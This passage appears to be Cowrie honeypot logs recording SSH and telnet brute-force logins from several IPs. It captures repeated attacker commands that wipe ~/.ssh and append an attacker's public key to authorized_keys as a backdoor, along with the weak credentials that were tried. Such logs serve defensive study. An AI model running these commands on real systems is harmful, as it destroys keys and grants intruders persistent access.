03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:49:41.346634Z","src_ip":"212.227.235.229","session":"34b33e7e51d0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:49:42.086521Z","src_ip":"212.227.235.229","session":"34b33e7e51d0"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:49:42.330851Z","src_ip":"212.227.235.229","session":"56df2278016b"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:49:42.334299Z","src_ip":"212.227.235.229","session":"34b33e7e51d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42592,"dst_ip":"1.2.3.4","dst_port":23,"session":"bd98e68f6f56","protocol":"telnet","message":"New connection: 212.227.235.229:42592 (1.2.3.4:23) [session: bd98e68f6f56]","sensor":"my-vps","timestamp":"2025-08-26T03:49:45.466134Z"}
{"eventid":"cowrie.session.closed","duration":12.746114015579224,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:49:53.017409Z","src_ip":"182.119.161.105","session":"a670cd05b0d8"}
{"eventid":"cowrie.session.closed","duration":13.862940073013306,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:49:59.328976Z","src_ip":"212.227.235.229","session":"bd98e68f6f56"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42934,"dst_ip":"1.2.3.4","dst_port":23,"session":"e1a115af0564","protocol":"telnet","message":"New connection: 212.227.235.229:42934 (1.2.3.4:23) [session: e1a115af0564]","sensor":"my-vps","timestamp":"2025-08-26T03:49:59.598963Z"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":37000,"dst_ip":"1.2.3.4","dst_port":22,"session":"597e6c9777c8","protocol":"ssh","message":"New connection: 68.183.87.241:37000 (1.2.3.4:22) [session: 597e6c9777c8]","sensor":"my-vps","timestamp":"2025-08-26T03:50:07.038460Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:50:07.039289Z","src_ip":"68.183.87.241","session":"597e6c9777c8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:50:07.296446Z","src_ip":"68.183.87.241","session":"597e6c9777c8"}
{"eventid":"cowrie.login.success","username":"root","password":"jack","message":"login attempt [root/jack] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:50:08.365486Z","src_ip":"68.183.87.241","session":"597e6c9777c8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:50:08.901804Z","src_ip":"68.183.87.241","session":"597e6c9777c8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:50:08.902569Z","src_ip":"68.183.87.241","session":"597e6c9777c8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:50:08.904020Z","src_ip":"68.183.87.241","session":"597e6c9777c8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:50:09.163685Z","src_ip":"68.183.87.241","session":"597e6c9777c8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:50:09.794012Z","src_ip":"68.183.87.241","session":"597e6c9777c8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T03:50:09.794824Z","src_ip":"68.183.87.241","session":"597e6c9777c8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T03:50:10.053423Z","src_ip":"68.183.87.241","session":"597e6c9777c8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:50:10.054211Z","src_ip":"68.183.87.241","session":"597e6c9777c8"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":37008,"dst_ip":"1.2.3.4","dst_port":22,"session":"22216afdebeb","protocol":"ssh","message":"New connection: 68.183.87.241:37008 (1.2.3.4:22) [session: 22216afdebeb]","sensor":"my-vps","timestamp":"2025-08-26T03:50:10.308635Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:50:10.309410Z","src_ip":"68.183.87.241","session":"22216afdebeb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:50:10.572687Z","src_ip":"68.183.87.241","session":"22216afdebeb"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T03:50:11.654172Z","src_ip":"68.183.87.241","session":"22216afdebeb"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:50:12.913644Z","src_ip":"68.183.87.241","session":"22216afdebeb"}
{"eventid":"cowrie.session.closed","duration":"305.0","message":"Connection lost after 305.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:50:12.989982Z","src_ip":"212.227.235.229","session":"da1e8164994b"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":37016,"dst_ip":"1.2.3.4","dst_port":22,"session":"5afdaf22555d","protocol":"ssh","message":"New connection: 68.183.87.241:37016 (1.2.3.4:22) [session: 5afdaf22555d]","sensor":"my-vps","timestamp":"2025-08-26T03:50:13.173356Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:50:13.174138Z","src_ip":"68.183.87.241","session":"5afdaf22555d"}
{"eventid":"cowrie.session.closed","duration":13.645148992538452,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:50:13.244044Z","src_ip":"212.227.235.229","session":"e1a115af0564"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:50:13.445023Z","src_ip":"68.183.87.241","session":"5afdaf22555d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43135,"dst_ip":"1.2.3.4","dst_port":23,"session":"592b0f6c01e2","protocol":"telnet","message":"New connection: 212.227.235.229:43135 (1.2.3.4:23) [session: 592b0f6c01e2]","sensor":"my-vps","timestamp":"2025-08-26T03:50:13.485870Z"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:50:14.552344Z","src_ip":"68.183.87.241","session":"5afdaf22555d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:50:14.816479Z","src_ip":"68.183.87.241","session":"5afdaf22555d"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:50:14.818952Z","src_ip":"68.183.87.241","session":"597e6c9777c8"}
{"eventid":"cowrie.session.closed","duration":13.830185890197754,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:50:27.315968Z","src_ip":"212.227.235.229","session":"592b0f6c01e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43401,"dst_ip":"1.2.3.4","dst_port":23,"session":"0c45ad5bd8f9","protocol":"telnet","message":"New connection: 212.227.235.229:43401 (1.2.3.4:23) [session: 0c45ad5bd8f9]","sensor":"my-vps","timestamp":"2025-08-26T03:50:29.699591Z"}
{"eventid":"cowrie.session.closed","duration":13.428070068359375,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:50:43.127600Z","src_ip":"212.227.235.229","session":"0c45ad5bd8f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43634,"dst_ip":"1.2.3.4","dst_port":23,"session":"5c8ccd66ce9e","protocol":"telnet","message":"New connection: 212.227.235.229:43634 (1.2.3.4:23) [session: 5c8ccd66ce9e]","sensor":"my-vps","timestamp":"2025-08-26T03:50:44.324506Z"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":50622,"dst_ip":"1.2.3.4","dst_port":22,"session":"37e2ea3f7742","protocol":"ssh","message":"New connection: 103.217.145.104:50622 (1.2.3.4:22) [session: 37e2ea3f7742]","sensor":"my-vps","timestamp":"2025-08-26T03:50:48.424101Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:50:48.424946Z","src_ip":"103.217.145.104","session":"37e2ea3f7742"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:50:48.691061Z","src_ip":"103.217.145.104","session":"37e2ea3f7742"}
{"eventid":"cowrie.login.success","username":"root","password":"Ws123456","message":"login attempt [root/Ws123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:50:49.969819Z","src_ip":"103.217.145.104","session":"37e2ea3f7742"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:50:50.566489Z","src_ip":"103.217.145.104","session":"37e2ea3f7742"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:50:50.567208Z","src_ip":"103.217.145.104","session":"37e2ea3f7742"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:50:50.568395Z","src_ip":"103.217.145.104","session":"37e2ea3f7742"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:50:51.410978Z","src_ip":"103.217.145.104","session":"37e2ea3f7742"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:50:51.960664Z","src_ip":"103.217.145.104","session":"37e2ea3f7742"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T03:50:51.961488Z","src_ip":"103.217.145.104","session":"37e2ea3f7742"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T03:50:52.230952Z","src_ip":"103.217.145.104","session":"37e2ea3f7742"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:50:52.231896Z","src_ip":"103.217.145.104","session":"37e2ea3f7742"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":51122,"dst_ip":"1.2.3.4","dst_port":22,"session":"a227f1b25bee","protocol":"ssh","message":"New connection: 103.217.145.104:51122 (1.2.3.4:22) [session: a227f1b25bee]","sensor":"my-vps","timestamp":"2025-08-26T03:50:52.503575Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:50:52.504689Z","src_ip":"103.217.145.104","session":"a227f1b25bee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:50:52.777141Z","src_ip":"103.217.145.104","session":"a227f1b25bee"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T03:50:53.909735Z","src_ip":"103.217.145.104","session":"a227f1b25bee"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:50:55.188270Z","src_ip":"103.217.145.104","session":"a227f1b25bee"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":51136,"dst_ip":"1.2.3.4","dst_port":22,"session":"79f3094bb8d0","protocol":"ssh","message":"New connection: 103.217.145.104:51136 (1.2.3.4:22) [session: 79f3094bb8d0]","sensor":"my-vps","timestamp":"2025-08-26T03:50:55.449501Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:50:55.450181Z","src_ip":"103.217.145.104","session":"79f3094bb8d0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:50:56.151695Z","src_ip":"103.217.145.104","session":"79f3094bb8d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49674,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d4f9754b883","protocol":"ssh","message":"New connection: 212.227.235.229:49674 (1.2.3.4:22) [session: 8d4f9754b883]","sensor":"my-vps","timestamp":"2025-08-26T03:50:56.568041Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:50:56.568876Z","src_ip":"212.227.235.229","session":"8d4f9754b883"}
